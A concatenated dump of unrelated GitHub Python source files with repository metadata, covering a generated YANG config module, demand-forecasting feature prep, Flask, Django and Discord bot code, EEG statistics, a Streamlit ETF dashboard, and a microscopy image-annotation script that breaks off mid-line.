self._log('reag-tag-values-unexpected-tag-end').errorFunc(): logFunc('got unexpected tag-value. expected: (%s, %s, type=%s), got: (%s, %s, type=%s)',\n \"test-generation_underscore\", \"http://qwilt.com/model/lake-example\", Value.kXmlEnd,\n tag, ns, valEnd.getType())\n self._clearAllReadData()\n return ReturnCodes.kGeneralError\n\n for logFunc in self._log('read-tag-values-done').debug3Func(): logFunc('done. tagValueList=%s, readAllOrFail=%s', tagValueList, readAllOrFail)\n return ReturnCodes.kOk\n\n\"\"\"\nExtracted from the below data: \n{\n \"node\": {\n \"containerClassName\": \"BlinkyTestGenerationUnderscoreMaapi\", \n \"name\": \"testGenerationUnderscore\", \n \"keyLeaf\": {\n \"varName\": \"testGenerationUnderscore\", \n \"yangName\": \"name\", \n \"typeHandler\": \"handler: StringHandler\"\n }, \n \"yangName\": \"test-generation_underscore\", \n \"namespace\": \"test_generation_underscore\", \n \"moduleYangNamespacePrefix\": \"lake-example\", \n \"className\": \"TestGenerationUnderscoreMaapiList\", \n \"importStatement\": \"from a.sys.blinky.example.lake_example.lake.fish_.test_generation_underscore.test_generation_underscore_maapi_list_gen import TestGenerationUnderscoreMaapiList\", \n \"baseClassName\": \"TestGenerationUnderscoreMaapiListBase\", \n \"moduleYangNamespace\": \"http://qwilt.com/model/lake-example\", \n \"containerModule\": \"test_generation_underscore_maapi_gen\", \n \"baseModule\": \"test_generation_underscore_maapi_list_base_gen\"\n }, \n \"ancestors\": [\n {\n \"moduleYangNamespacePrefix\": \"lake-example\", \n \"isCurrent\": false, \n \"yangName\": \"lake\", \n \"namespace\": \"lake\", \n \"isList\": true, \n \"moduleYangNamespace\": \"http://qwilt.com/model/lake-example\", \n \"keyLeaf\": {\n \"varName\": \"lake\", \n \"yangName\": \"name\", \n \"typeHandler\": \"handler: StringHandler\"\n }, \n \"name\": \"lake\"\n }, \n {\n \"moduleYangNamespacePrefix\": \"lake-example\", \n \"isCurrent\": false, \n \"yangName\": \"fish\", \n \"namespace\": \"fish_\", \n \"isList\": true, \n \"moduleYangNamespace\": \"http://qwilt.com/model/lake-example\", \n \"keyLeaf\": {\n \"varName\": \"fish_\", \n \"yangName\": \"id\", \n \"typeHandler\": \"handler: StringHandler\"\n }, \n \"name\": \"fish_\"\n }, \n {\n \"moduleYangNamespacePrefix\": \"lake-example\", \n \"isCurrent\": true, \n \"yangName\": \"test-generation_underscore\", \n \"namespace\": \"test_generation_underscore\", \n \"isList\": true, \n \"moduleYangNamespace\": \"http://qwilt.com/model/lake-example\", \n \"keyLeaf\": {\n \"varName\": \"testGenerationUnderscore\", \n \"yangName\": \"name\", \n \"typeHandler\": \"handler: StringHandler\"\n }, \n \"name\": \"test-generation_underscore\"\n }\n ], \n \"descendants\": [], \n \"conditionalDebugName\": null, \n \"operLeaves\": [], \n \"module\": {}, \n \"configLeaves\": [\n {\n \"moduleYangNamespace\": \"http://qwilt.com/model/lake-example\", \n \"moduleYangNamespacePrefix\": \"lake-example\", \n \"typeHandler\": \"handler: StringHandler\", \n \"memberName\": \"name\", \n \"yangName\": \"name\", \n \"object\": \"\", \n \"leafrefPath\": null, \n \"defaultVal\": null, \n \"hasDefaultRef\": false\n }\n ], \n \"env\": {\n \"namespaces\": [\n \"a\", \n \"sys\", \n \"blinky\", \n \"example\", \n \"lake_example\"\n ]\n }, \n \"leaves\": [\n {\n \"moduleYangNamespace\": \"http://qwilt.com/model/lake-example\", \n \"moduleYangNamespacePrefix\": \"lake-example\", \n \"typeHandler\": \"handler: StringHandler\", \n \"memberName\": \"name\", \n \"yangName\": \"name\", \n \"object\": \"\", \n \"leafrefPath\": null, \n \"defaultVal\": null, \n \"hasDefaultRef\": false\n }\n ], \n \"createTime\": \"2013\"\n}\n\"\"\"\n\n\n","repo_name":"afeset/miner2-tools","sub_path":"oscar/a/sys/blinky/example/lake_example/lake/fish_/test_generation_underscore/test_generation_underscore_maapi_list_gen.py","file_name":"test_generation_underscore_maapi_list_gen.py","file_ext":"py","file_size_in_byte":25801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26258358900","text":"import pandas as pd\nimport numpy as np\nimport geohash\nfrom sklearn.cluster import KMeans\nimport datetime as dt\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\ndef get_14_days_data(data):\n \"\"\"\n This function returns data from the past 14 days\n \"\"\"\n dem = data.sort_values([\"day\",\"timestamp\"])\n dem.index = range(len(dem))\n last_entry = dem.iloc[-1]\n last_day = last_entry.day\n last_time = dt.datetime.strptime(last_entry.timestamp,\"%H:%M\")\n next_time = last_time+dt.timedelta(minutes=15)\n next_time_str = str(next_time.hour)+\":\"+str(next_time.minute)\n last_14_day_time = last_time-dt.timedelta(days=14)+dt.timedelta(minutes=15)\n last_14_day_time_str = str(last_14_day_time.hour)+\":\"+str(last_14_day_time.minute)\n next_day = last_day+next_time.day-1\n last_14_day = next_day-14\n try:\n start_index = dem[(dem.day==last_14_day)&(dem.timestamp==last_14_day_time_str)].index[0]\n train = dem.loc[start_index:]\n except:\n train = dem\n \n def prepare_data(data):\n data['hour'] = data.timestamp.apply(lambda x: int(x.split(\":\")[0]))\n data['minutes'] = data.timestamp.apply(lambda x: int(x.split(\":\")[1]))\n data['t'] = ((data['day']-1)*(24*60)+data['hour']*60+data['minutes'])/15\n data['t_day'] = (data['t']%(24*4))\n data['t_week'] = (data['t']%(24*28))\n data['dayofweek'] = data.day%7\n data = data.sort_values([\"geohash6\",\"t\"])\n data.index = range(len(data))\n return data\n train = prepare_data(train)\n last_t = train[train.timestamp==last_entry.timestamp].t.max()\n train = train[train['t']<=last_t]\n\n return train, next_day, next_time_str\n\ndef prepare_data_for_cluster(data):\n \"\"\"\n This function return normalized data for each day, each geohash6\n \"\"\"\n by_t_day = data.groupby([\"geohash6\",\"dayofweek\",\"t_day\"]).demand.mean().unstack().fillna(0)\n mean_across_t = by_t_day.mean()\n std_across_t = by_t_day.std()\n by_t_day_norm = (by_t_day-mean_across_t)/std_across_t\n mean_across_geo = by_t_day_norm.mean(axis=1)\n std_across_geo = by_t_day_norm.std(axis=1)\n by_t_day_norm = (by_t_day_norm.T-mean_across_geo)/std_across_geo\n return by_t_day_norm\n\ndef cluster(data_norm):\n \"\"\"\n For each geohash, each day, we learn the daily pattern series\n and then put them into a separate cluster --> label them based on the cluster\n \"\"\"\n train = data_norm.T\n km = KMeans(random_state=1, n_clusters=8)\n clusters = km.fit_predict(train)\n clustered = pd.Series(clusters, index=train.index)\n clustered_piv = clustered.unstack().T\n clustered_piv = clustered_piv.fillna(clustered_piv.median(axis=0))\n result = clustered_piv.unstack().reset_index().rename(columns={0:'time_cluster'})\n return result\n\ndef get_fourier(data_piv):\n \"\"\"\n For each geohash, we get the top 5 fourier values\n \"\"\"\n freq = np.fft.rfftfreq(len(data_piv.columns), 1.0)\n ffs = []\n top_5_freqs_dict = {}\n top_5_amplis_dict = {}\n for i in range(len(data_piv)):\n the_data = data_piv.iloc[i]\n f = np.abs(np.fft.rfft(the_data))\n top_5 = pd.Series(f, index=freq).iloc[1:].sort_values(ascending=False).head(5)\n top_5_freqs_dict[the_data.name] = top_5.index\n top_5_amplis_dict[the_data.name] = top_5.values\n ffs.append(f)\n \n ffs_df_ = pd.DataFrame(ffs,index=data_piv.index,columns=freq)\n agg_fouriers_df = ffs_df_.iloc[:, 1:].max().sort_values(ascending=False).reset_index()\n top_5_freqs_df = pd.DataFrame(top_5_freqs_dict, index=[\"fft_f_\"+str(i) for i in range(5)]).T\n top_5_amplis_df = pd.DataFrame(top_5_amplis_dict, index=[\"fft_a_\"+str(i) for i in range(5)]).T\n return top_5_freqs_df, top_5_amplis_df, agg_fouriers_df\n\ndef get_n_previous_demand(df, list_n):\n \"\"\"\n Get the previous demand values (t-1, t-2, etc) based on list_n\n \"\"\"\n demand_shifts = []\n for i in list_n:\n the_shift = df.T.shift(i).unstack()\n the_shift.name = \"d-\"+str(i)\n demand_shifts.append(the_shift)\n demand_shifts_df = pd.concat(demand_shifts, axis=1).dropna()\n return demand_shifts_df\n\ndef augment_data(raw_data):\n \"\"\"\n raw_data is whatever data provided (input) from the csv file\n This function converts raw_data into train data\n \"\"\"\n temp, n_day, n_time = get_14_days_data(raw_data)\n temp_norm = prepare_data_for_cluster(temp)\n clustered = cluster(temp_norm)\n\n # get demand for eact unique time \"t\"\n by_t = temp.pivot_table(index=\"geohash6\",columns=\"t\",values=\"demand\").fillna(0)\n\n # get fourier values\n top_5_freqs, top_5_amplis, agg_fouriers = get_fourier(by_t)\n\n # get latlon for each geohash\n latlon = map(lambda x: geohash.decode_exactly(x), top_5_amplis.index)\n loc = pd.DataFrame({\n 'lat': [x[1] for x in latlon],\n 'lon': [x[0] for x in latlon]\n },\n index=top_5_amplis.index)\n \n # merge fourier and location\n var_add = pd.concat([top_5_freqs, top_5_amplis, loc], axis=1)\n\n # get previous demand values\n selected_periods = [1,2,3,4,5,6,7,8,96,192]\n ds = get_n_previous_demand(by_t, selected_periods)\n\n # create training data\n base = temp[[\"geohash6\",\"t\",\"demand\",\"dayofweek\",\"hour\",\"minutes\",\"timestamp\",\"day\"]]\n base = pd.merge(ds.reset_index(), base, how=\"right\", on=[\"geohash6\",\"t\"]).dropna()\n base = pd.merge(base, clustered, on=[\"geohash6\",\"dayofweek\"], how=\"left\")\n base = pd.merge(base, var_add.reset_index().rename(columns={'index':'geohash6'}), how=\"left\", on=\"geohash6\")\n base = base.sort_values([\"geohash6\",\"t\"])\n base.index = range(len(base))\n\n # return training data and table of all previous demands\n return base, by_t\n\n\n","repo_name":"nmonarizqa/grab-tm","sub_path":"prep_data.py","file_name":"prep_data.py","file_ext":"py","file_size_in_byte":5642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70222523754","text":"from flask import current_app as app\nfrom flask_login import current_user\nfrom app.blueprints.shop.models import Cart, Product\nfrom functools import reduce\n\n@app.context_processor\ndef display_cart_info():\n cart_list = {}\n if current_user.is_authenticated:\n cart = Cart.query.filter_by(user_id=current_user.id).all()\n if len(cart) > 0:\n for i in cart:\n p = Product.query.get(i.product_id)\n if i.product_id not in cart_list.keys():\n cart_list[p.id] = {\n 'id': i.id,\n 'product_id': p.id,\n 'quantity': 1,\n 'name': p.song_name,\n 'song_artist': p.song_artist,\n 'price': p.price,\n 'tax': p.tax,\n }\n else:\n cart_list[p.id]['quantity'] += 1\n else: \n return { \n 'cart': {\n 'items': cart,\n 'display_cart': cart_list.values(),\n 'tax': round(reduce(lambda x,y:x+y, [i['tax'] for i in cart_list.values()]), 2) if len(cart_list.values()) > 0 else 0,\n 'subtotal': round(reduce(lambda x,y:x+y, [i['price'] for i in cart_list.values()]), 2) if len(cart_list.values()) > 0 else 0,\n 'grand_total': round(reduce(lambda x,y:x+y, [i['price'] + i['tax'] for i in cart_list.values()]), 2) if len(cart_list.values()) > 0 else 0\n }\n }\n else:\n return {\n 'cart': {\n 'items': [],\n 'display_cart': [],\n 'tax': float(0.00),\n 'subtotal': float(0.00),\n 'grand_total': float(0.00)\n }\n }","repo_name":"enavs/music_project","sub_path":"app/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41316586067","text":"#!/usr/bin/env python\n\nimport pandas as pd\nimport statistics\nfrom typing import List\n\n'''\nThis file provides measuring functions\n'''\n\ndef getChannelUsageInEpochSeries(epochSeries : pd.Series, featureSeries : bool, printUsage=False):\n ''' Count how often each channel is represented in the given sereies of epochs \n \n @param epochSeries: A series of epochs, can be a normal epoch series or feature epoch series\n @param featureSereies: If true then we have to count different, \n because the feature epoch series has the channel in the index\n (and the other in the columns)\n @parm printUsage: Prints the most used channels\n\n @return: A list of the most used channels by descending order\n ''' \n\n foundChannels = {}\n\n if featureSeries: # feature epoch series\n for epoch in epochSeries: # loop through the epochs\n for index, row in epoch.iterrows(): # loop through the rows\n try:\n foundChannels[index] += 1\n except KeyError: # if not in the dict, add it\n foundChannels[index] = 1\n\n else: # normal epoch series\n for epoch in epochSeries:\n #for columns in epochSeries[1].columns:\n for columns in epoch.columns:\n try:\n foundChannels[columns] += 1\n except KeyError: # if not in the dict, add it\n foundChannels[columns] = 1\n\n\n #sortedFoundChannels = sorted(foundChannels.items(), key=lambda item: item[1], reverse=True) # sort by found times\n\n mostUsedChannelsListDesc = []\n\n for key, value in sorted(foundChannels.items(), key=lambda item: item[1], reverse=True): # sort by found times\n if printUsage:\n print(\"{} used {} times\".format(key, value))\n\n mostUsedChannelsListDesc.append(key)\n\n return mostUsedChannelsListDesc\n\n\ndef faultyFeaturesNames(df : pd.DataFrame, maxPercentageMissing = 0.0) -> pd.Series:\n ''' Measure the most stable feature, by counting the NaN Values and return a series of columns which are not acceptable\n\n Return a list of column names where the maximum percentage is higher then the given parameter\n So the returned columns are not acceptable and have to be deleted.\n If no column name gets returned then every column is below or equal of 'maxPercentage'\n '''\n if df is None:\n return df\n \n percent_missing = df.isnull().sum() * 100 / len(df)\n missing_value_df = pd.DataFrame({'column_name': df.columns,\n 'percent_missing': percent_missing})\n \n missing_value_df.sort_values('percent_missing', inplace=True)\n \n missing_value_df = missing_value_df[missing_value_df['percent_missing'] > maxPercentageMissing]\n return missing_value_df['column_name']\n\ndef countRecordsOfDf(df : pd.DataFrame) -> int:\n ''' Count a df with checks if its empty or None '''\n if df is None or df.empty:\n return 0\n else:\n return len(df)\n\n\ndef calculateMeanOverEpochs(valueList : List, numberOfEpochs : int = 5) -> List:\n ''' Calculate the mean over a given number of epochs\n e.g. if numberOfEpoch is 5 then the mean will get calculated from epoch 0-4; 5-9; 10-14; ...\n \n @param valueList: A list of values, where each entry represnts one epoch\n @param numberOfEpochs: A number which defines how many epochs should included in the calculations\n '''\n meanValueList = []\n start = 0\n end = numberOfEpochs\n for i in range(0, len(valueList), numberOfEpochs):\n meanValue = statistics.mean(valueList[start:end])\n meanValueList.append(meanValue)\n start += numberOfEpochs\n end += numberOfEpochs\n\n return meanValueList\n\ndef calculateStandardDeviationOverEpochs(valueList : List, numberOfEpochs : int = 5) -> List:\n ''' Calculate the standard deviation over a given number of epochs\n e.g. if numberOfEpoch is 5 then the standard deviation will get calculated from epoch 0-4; 5-9; 10-14; ...\n \n @param valueList: A list of values, where each entry represnts one epoch\n @param numberOfEpochs: A number which defines how many epochs should included in the calculations\n '''\n stDev_valueList = []\n start = 0\n end = numberOfEpochs\n for i in range(0, len(valueList), numberOfEpochs):\n value = statistics.stdev(valueList[start:end])\n stDev_valueList.append(value)\n start += numberOfEpochs\n end += numberOfEpochs\n\n return stDev_valueList","repo_name":"mudo121/thesis_eeg","sub_path":"code/Measuring_Functions.py","file_name":"Measuring_Functions.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20341488700","text":"from typing import Union\nfrom variable import DdExpression\n\n\nclass NodeManager:\n\n def __init__(self):\n self.node_cache = {}\n\n def new_node(self, node_expr: DdExpression, low_expr: DdExpression = None, high_expr: DdExpression = None):\n return self.node_cache.setdefault((node_expr,\n low_expr if low_expr is not None else None,\n high_expr if high_expr is not None else None),\n Node(node_expr))\n\n\nclass XADDFactory:\n\n def __init__(self):\n pass\n\n\nclass Node:\n\n def __init__(self,\n val_func: Union[DdExpression,float,int],\n low_node: 'Node'=None,\n high_node: 'Node'=None) -> None:\n val_func = val_func if isinstance(val_func, DdExpression) else DdExpression(val_func)\n self.val_func = val_func\n self.low_node = low_node\n self.high_node = high_node\n","repo_name":"TomMcL/xadd","sub_path":"factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40533707480","text":"from django.contrib import admin\nfrom .models import *\nimport admin_thumbnails\nfrom django.db.models import ManyToManyField\nfrom django.forms import CheckboxSelectMultiple\n\n# Register your models here.\nadmin.site.register(Japan_clothes),\nadmin.site.register(Japan_clothes_Comment),\nadmin.site.register(Japan_foods),\nadmin.site.register(Japan_others),\nJapan_clothes_Comment\nadmin.site.register(USA_clothes),\nadmin.site.register(USA_foods),\nadmin.site.register(USA_others),\n\nadmin.site.register(Vietnam_clothes),\nadmin.site.register(Vietnam_foods),\nadmin.site.register(Vietnam_others),\n\n#커뮤니티 기능\nclass CommentInLine(admin.TabularInline):\n model = Comment\n extra = 1\n\n@admin_thumbnails.thumbnail(\"photo\")\nclass PostImageInLine(admin.TabularInline):\n model = PostImage\n extra = 1\n \n@admin.register(Post)\nclass PostAdmin(admin.ModelAdmin):\n list_display = [\n \"id\",\n \"title\",\n \"content\",\n \"thumbnail\",\n ]\n inlines = [\n CommentInLine,\n PostImageInLine,\n ]\n formfield_overrides = {\n ManyToManyField: {\"widget\":CheckboxSelectMultiple},\n }\n\n@admin.register(PostImage)\nclass PostImageAdmin(admin.ModelAdmin):\n list_display = [\n \"id\",\n \"post\",\n \"photo\",\n ]\n\n@admin.register(Comment)\nclass CommentAdmin(admin.ModelAdmin):\n list_display = [\n \"id\",\n \"post\",\n \"content\",\n ]\n\n@admin.register(HashTag)\nclass HashTagAdmin(admin.ModelAdmin):\n pass","repo_name":"pookey1104/Savior","sub_path":"savior/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"39751008939","text":"from rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom core.models import Author\nfrom .serializers import AuthorSerializer, BookSerializer\nfrom core.models import Book,Author,Genre\nfrom .permissions import IsAdminOrReadOnly\n\nclass BooksByAuthor(APIView):\n permission_classes = [IsAdminOrReadOnly]\n \n def get(self,request,slug):\n \n if Author.objects.filter(slug = slug).exists():\n print(\"Author Exists\")\n books = Book.objects.filter(author__slug = slug)\n if books:\n serializer = BookSerializer(books,many=True,context={'request':request})\n return Response(serializer.data)\n else:\n return Response({\"Error 404\":\"No books from this Author\"})\n\n else:\n return Response({\n \"Error 404\": \"Author does not Exist.\"\n })\n \n def post(self,request,slug):\n \n if Author.objects.filter(slug = slug).exists():\n author = Author.objects.get(slug = slug)\n serializer = BookSerializer(data = request.data,context={'request':request})\n if serializer.is_valid():\n serializer.save(author = author)\n return Response(serializer.data)\n else:\n return Response(serializer.errors)\n else:\n return Response({\n \"Error 404\": \"Author does not Exist.\"\n })\n\nclass BooksByGenre(APIView):\n permission_classes = [IsAdminOrReadOnly]\n def get(self,request,slug):\n if Genre.objects.filter(slug=slug).exists():\n \n books = Book.objects.filter(genre__slug = slug)\n if books:\n serializer = BookSerializer(books,many=True,context={'request':request})\n return Response(serializer.data)\n else:\n return Response({\"Error 404\":\"Books by Requested Genre does not exist.\"})\n \n else:\n return Response({\"Error 404\":\"Requested Genre does not exist.\"})\n \n def post(self,request,slug):\n \n if Genre.objects.filter(slug = slug).exists():\n genre = Genre.objects.get(slug = slug)\n print(genre)\n serializer = BookSerializer(data = request.data,context={'request':request})\n if serializer.is_valid():\n serializer.save(genre = genre)\n return Response(serializer.data)\n else:\n return Response(serializer.errors)\n else:\n return Response({\n \"Error 404\": \"Genre does not Exist.\"\n })\n","repo_name":"Alexeino/KLIB_API","sub_path":"core/api/by_views.py","file_name":"by_views.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39926369952","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\nclass AverageMeter:\n def __init__(self):\n self.val = 0\n self.avg = 0\n self.nums = 0\n self.sum = 0 \n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.nums = 0\n self.sum = 0\n \n def update(self, val, n=1):\n self.val = val\n self.sum += val\n self.nums += n\n self.avg = self.sum / self.nums\n ","repo_name":"QiliangFan/NoduleDetection","sub_path":"network/meter.py","file_name":"meter.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39273837726","text":"import json\nimport discord\n\nfrom random import choice\nfrom discord.ext import commands\nfrom resources.check import check_it\nfrom resources.db import Database\n\nwith open(\"resources/auth.json\") as security:\n _auth = json.loads(security.read())\n\ncolor = int(_auth['default_embed'], 16)\n\n\nclass DrawUsers(object):\n def __init__(self, bot):\n self.bot = bot\n\n @check_it(no_pm=True)\n @commands.check(lambda ctx: Database.is_registered(ctx, ctx))\n @commands.cooldown(1, 5.0, commands.BucketType.user)\n @commands.command(name='draw', aliases=['sorteio'])\n async def draw(self, ctx):\n draw_member = choice(list(ctx.guild.members))\n member = discord.utils.get(ctx.guild.members, name=\"{}\".format(draw_member.name))\n embed = discord.Embed(\n title=\"``Fiz o sorteio de um membro``\",\n colour=color,\n description=\"Membro sorteado foi **{}**\\n <a:palmas:520418512011788309>│``Parabens!!``\".format(member)\n )\n embed.set_author(name=self.bot.user.name, icon_url=self.bot.user.avatar_url)\n embed.set_footer(text=\"Ashley ® Todos os direitos reservados.\")\n embed.set_thumbnail(url=member.avatar_url)\n await ctx.send(embed=embed)\n\n\ndef setup(bot):\n bot.add_cog(DrawUsers(bot))\n print('\\033[1;32mO comando \\033[1;34mSORTEIO\\033[1;32m foi carregado com sucesso!\\33[m')\n","repo_name":"PatchKnow/Ashley","sub_path":"commands/utility/draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31430368184","text":"def facto(n):\n if n==1 or n==0:\n return 1\n else:\n return n * facto(n-1)\nn = int(input(\"Enter a Number : \"))\nprint(facto(n))\n\n\n\ndef fact1(n):\n if n<0:\n return \"invalid input\"\n elif n==0 or n==1:\n return 1\n else:\n fact=1\n while n>1:\n fact*=n\n n-=1\n return fact\nn=5\nprint(fact1(n))","repo_name":"BhushanAmbilkar/Real_Time_python_interview_question","sub_path":"Python/FactorialOfNum.py","file_name":"FactorialOfNum.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"72263925033","text":"import streamlit as st\nimport pandas as pd\nimport requests\nimport altair as alt\n\nst.title(\"ETF Composition\")\n\ndf = pd.read_csv('data/blackrock_fr.csv')\n\nchoice = st.selectbox(\"Select a fund\", df.Fund.unique())\n\nselected_fund = df[df.Fund == choice].drop(columns=['Fund']).copy()\nselected_fund['Weight (%)'] = selected_fund['Weight (%)'].round(2)\n\nsectors = selected_fund.groupby('Sector')['Weight (%)'].sum()\nregions = selected_fund.groupby('Location')['Weight (%)'].sum()\nasset_classes = selected_fund.groupby('Asset Class')['Weight (%)'].sum()\n\ncol1, col2, col3 = st.columns(3)\ncol1.metric(\"Top 10 concentration\", value=f\"{selected_fund.iloc[:10]['Weight (%)'].sum():.0f}%\")\ncol2.metric(\"Largest sector\", value=f'{sectors.max():.0f}%', delta=sectors.idxmax(), delta_color='off')\ncol3.metric(\"Largest region\", value=f'{regions.max():.0f}%', delta=regions.idxmax(), delta_color='off')\n\nst.header('Sectors')\nc_sectors = alt.Chart(sectors.sort_values().reset_index()).mark_bar().encode(\n x='Weight (%)',\n y=alt.Y('Sector', sort='-x'),\n tooltip=['Sector', 'Weight (%)']\n)\nst.altair_chart(c_sectors, use_container_width=True)\n\nst.header('Asset Classes')\nc_asset_classes = alt.Chart(asset_classes.sort_values().reset_index()).mark_bar().encode(\n x='Weight (%)',\n y='Asset Class',\n tooltip=['Asset Class', 'Weight (%)']\n)\nst.altair_chart(c_asset_classes, use_container_width=True)\n\nst.header('Regions')\nc = alt.Chart(regions.sort_values().reset_index()).mark_bar().encode(\n x='Weight (%)',\n y=alt.Y('Location', sort='-x'),\n tooltip=['Location', 'Weight (%)']\n)\nst.altair_chart(c, use_container_width=True)\n\nst.header('Holdings')\nst.dataframe(selected_fund)\n","repo_name":"hugolmn/finance-tools","sub_path":"pages/ETF Analyzer.py","file_name":"ETF Analyzer.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"8211624938","text":"# import glob.glob\nimport skimage.io\nimport numpy as np\nimport PIL\nfrom PIL import Image\nfrom PIL import ImageFont\nfrom PIL import ImageDraw\n\n# import matplotlib.pyplot as plt\nimport os.path\n\n\ndef process_fp(im, ROI, min_fp, max_fp):\n lim = im.copy()\n lim[im < min_fp] = 0\n # rescale = skimage.exposure.rescale_intensity(im, in_range=(min_fp, max_fp), out_range=\"uint8\").astype(np.uint8)\n print(min_fp, max_fp)\n rescale = skimage.exposure.rescale_intensity(\n lim, in_range=(min_fp, max_fp), out_range=(0, 255)\n ).astype(np.uint8)\n # rescale = skimage.exposure.rescale_intensity(im, in_range=(0, max_fp), out_range=(0, 255)).astype(np.uint8)\n # plt.figure()\n # plt.hist(rescale.flatten(), bins=np.arange(1,256))\n # plt.show()\n cuted = rescale[ROI]\n return cuted\n\n\ndef process_phase(im, ROI, min_fp, max_fp):\n rescale = skimage.exposure.rescale_intensity(\n im, in_range=(min_fp, max_fp), out_range=\"uint8\"\n ).astype(np.uint8)\n cuted = rescale[ROI]\n return cuted\n\ndef min_to_hours(mins):\n hours = mins//60\n left = mins - (hours*60)\n return f\"{hours}h {left}m\"\n\ndef add_annotations(im, i):\n pilim = Image.fromarray(im)\n draw = ImageDraw.Draw(pilim)\n # font = ImageFont.truetype(<font-file>, <font-size>\n font = ImageFont.truetype(\"Arial\", 60)\n smallfont = ImageFont.truetype(\"Arial\", 30)\n # draw.text((x, y),\"Sample Text\",(r,g,b))\n # draw.text((0, 0), \"{0} mins\".format(i * 15), (255, 255, 255), font=font)\n draw.text((0, 0), min_to_hours((i-21) * 15), (255, 255, 255), font=font)\n try:\n annotation_list = arrow_locations[i]\n for arrow_loc, direct, num in annotation_list:\n actual_loc = (arrow_loc[0] - ROI[1].start, arrow_loc[1] - ROI[0].start)\n if direct == \"r\":\n draw.bitmap(actual_loc, arrpil_r, fill=(255, 255, 255))\n num_offset = (0, 0)\n else:\n draw.bitmap(actual_loc, arrpil, fill=(255, 255, 255))\n num_offset = (30, 0)\n num_loc = tuple([sum(x) for x in zip(actual_loc, num_offset)])\n draw.text(num_loc, \"{0}\".format(num), (256, 255, 255), font=smallfont)\n except KeyError:\n pass\n return np.array(pilim)\n\n\ndef add_no_over(a, b):\n r = a.copy()\n b = 255 - b\n np.putmask(r, b < r, b)\n r += 255 - b\n return r\n\n\n\"\"\" Original del RU movie \n path = \"movie_strip/sigB_biofilmpad6-O001_3-{0}-{1:03d}.tif\"\n start = 22\n end = 31\n outimage = \"sigB_biofilmpad6-O001_3_1\" \n #image_range = list(range(22, 33))\n image_range = list(range(23, 33))\n arrow_locations = { # in XY\n 22: (663, 552),\n 23: (665, 552),\n 24: (665, 559),\n 25: (670, 550),\n 26: (675, 535),\n 27: (675, 520),\n 28: (675, 520),\n 29: (685, 520),\n 30: (693, 510),\n 31: (693, 510),\n 32: (700, 510),\n } \n\"\"\"\nif __name__ == \"__main__\":\n this_dir = os.path.dirname(__file__)\n #rpath = \"/media/nmurphy/BF_Data_Orange/proc_data/biofilm_fig1/2015-11-03/sigB_biofilmfinal-B_4/images/sigB_biofilmfinal-B_4-{0}-{1:03d}.tif\"\n rpath = \"/media/nmurphy/Seagate Backup Plus Drive/proc_data/padmovies/2015-11-03/sigB_biofilmfinal-B_4/images/sigB_biofilmfinal-B_4-{0}-{1:03d}.tif\"\n path = os.path.join(this_dir, rpath)\n # image_range = list(range(22, 33))\n outimage = \"sigB_biofilmfinal-B_4_movie\"\n image_range = list(range(21, 40, 1))\n arrow_locations = {}\n # arrow_locations = { # in XY\n # 25: [((700, 558), \"l\", 1)], # 375\n # 26: [((703, 553), \"l\", 1)], # 390\n # 27: [((707, 585), \"l\", 1)], # 405\n # 28: [((695, 568), \"l\", 1)], # 420\n # 29: [((715, 565), \"l\", 1)], # 435\n # 30: [((720, 526), \"l\", 1)], # 450\n # 31: [((712, 536), \"l\", 1)], # 465\n # 32: [((718, 542), \"l\", 1)], # 480\n # 33: [((700, 565), \"l\", 2)], # 495\n # 34: [((670, 566), \"l\", 2)], # 510\n # 35: [((660, 560), \"l\", 2)], # 525\n # 36: [((662, 575), \"l\", 2),\n # ((550, 543), \"r\", 3) ], # 540 # tracking a different cell now\n # 37: [((650, 565), \"l\", 2),\n # ((520, 520), \"r\", 3)], # 555\n # 38: [((570, 510), \"l\", 3)], # 570\n # 39: [((550, 500), \"l\", 3)], # 585\n # 40: [((555, 490), \"l\", 3)] # 600\n # }\n yfp_images = [skimage.io.imread(path.format(\"y\", i)) for i in image_range]\n phs_images = [skimage.io.imread(path.format(\"p\", i)) for i in image_range]\n rfp_images = [skimage.io.imread(path.format(\"t\", i))[0, :, :] for i in image_range]\n print(yfp_images[0].shape, rfp_images[0].shape)\n max_yfp = 500 # 350 #np.max([ y.max() for y in yfp_images])\n # min_yfp = 254 #(max bacground)\n min_yfp = 269 # 300 #329 #(mean off cell)\n max_rfp = 500 # chosen\n min_rfp = 220 # chosen\n max_phase = np.max([y.max() for y in phs_images])\n min_phase = np.min([y.min() for y in phs_images])\n # ROI = (slice(300,760), slice(570, 780)) # Row Col\n ROI = (slice(300, 760), slice(500, 800)) # Row Col\n\n arrow = skimage.io.imread(os.path.join(this_dir, \"arrow_ang.tif\")) # [:, :,0]\n # skimage.io.imsave(\"arrow_ang.tif\", arrow)\n\n # rarrow = 